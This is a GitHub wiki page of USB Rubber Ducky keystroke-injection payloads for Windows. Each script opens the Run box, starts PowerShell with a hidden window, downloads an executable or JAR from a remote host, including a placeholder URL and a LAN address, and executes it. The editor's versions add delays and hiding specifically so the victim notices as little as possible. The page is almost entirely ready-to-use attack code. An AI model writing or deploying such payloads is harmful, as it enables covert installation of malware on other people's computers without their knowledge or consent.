Payload Powershell Wget + Execute - a3rd/USB-Rubber-Ducky GitHub Wiki
Powershell Wget + Execute
Author: mubix Duckencoder: 1.2 Target: Windows 7 Description: Opens “RUN” box, throws power shell string, enter. Supports HTTP/S, and proxies.
GUI r DELAY 100 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe" ENTER
Adding two words to this makes it possible to hide the powershell window as it downloads and executes.
GUI r
DELAY 100
STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"
ENTER
Edited by: Fahad Alkamli This is an improved version for the code above. In my opinion the user should see as minimum as possible so writing a whole line of code in the run is not discreet.
REM You can remove this Delay line in the beginning (I just rather having it just in case)
DELAY 60000
REM open the Run
GUI r
REM Change this value depending on the computer you are using ( i mean slow or not )
DELAY 100
STRING powershell -windowstyle hidden
ENTER
REM the shell usually takes a few seconds to fully run so i put a delay just in case .
DELAY 1000
REM I just wanted to note that the file can be an EXE or JAR file doesn't really matter.
REM in the destination if you put the fileName only, the file will be saved under C:\Users\LoggedInUser
STRING $source = "File URL "; $destination = "Path\FileName"; Invoke-WebRequest $source -OutFile $destination;
ENTER
DELAY 5000
STRING start-process FileName.EXE
ENTER
DELAY 100
STRING exit
ENTER
REM You can remove this Delay line in the beginning (I just rather having it just in case)
DELAY 60000
REM open the Run
GUI r
REM Change this value depending on the computer you are using ( i mean slow or not )
DELAY 100
STRING powershell -windowstyle hidden
ENTER
REM the shell usually takes a few seconds to fully run so i put a delay just in case .
DELAY 1000
REM I just wanted to note that the file can be an EXE or JAR file doesn't really matter.
REM in the destination if you put the fileName only, the file will be saved under C:\Users\LoggedInUser
STRING $source = "http://192.168.43.34/Service.jar"; $destination = "Service.jar"; Invoke-WebRequest $source -OutFile $destination;
ENTER
DELAY 5000
STRING start-process Service.jar
ENTER
DELAY 100
STRING exit
ENTER